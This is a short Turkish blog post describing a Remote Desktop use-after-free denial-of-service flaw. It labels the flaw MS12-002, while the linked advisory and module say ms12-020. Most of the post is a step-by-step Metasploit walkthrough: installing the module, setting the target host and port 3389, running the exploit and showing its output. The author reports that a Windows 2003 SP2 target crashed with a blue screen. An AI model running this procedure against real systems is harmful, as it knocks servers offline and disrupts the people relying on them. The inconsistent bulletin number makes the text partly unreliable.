MS12-002 Microsoft Remote Desktop Use-After-Free Vulnerability DOS
Luigi Auriemma, Microsoft RDP servisini etkileyen kritik bir dos zaafiyeti yayımlandı. MS12-002 güvenlik bülteni ile yayımlanan zayıflık, rdp servisinin ve işletim sisteminin çökmesine sebebiyet veriyor.
Belki uzakdan kod çalıştırmak mümkün fakat, henüz bu durum kanıtlanmamış.
Açıklıkla ilgili detaylı bilgi: http://aluigi.org/adv/ms12-020_leak.txt
Exploitin metasploit modülü mevcut;
Exploitin Uygulanışı ve Kullanımı:
Download ettikden sonra, herhangi bir windows dizinine kopyalayabilirsiniz;
# cp Desktop/ms12_020_maxchannelids.rb /opt/framework-3.7.1/msf3/modules/exploits/windows/misc/
msf auxiliary(ms12_020_maxchannelids) > set RHOST 1.1.1.124
RHOST => 1.1.1.124
msf auxiliary(ms12_020_maxchannelids) > set RPORT 3389
RPORT => 3389
msf auxiliary(ms12_020_maxchannelids) > exploit[*] 1.1.1.124:3389 – Sending MS12-002 Microsoft Remote Desktop Use-After-Free Vulnerability
[*] 1.1.1.124:3389 – 210 bytes sent
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) >
win2k3 SP2 sisteme denenmiştir ve exploit uygulandıkdan sonra hedef sistemin mavi ekran verdiği gözlemlenmiştir.
Yazar: Ozan UÇAR
[email protected]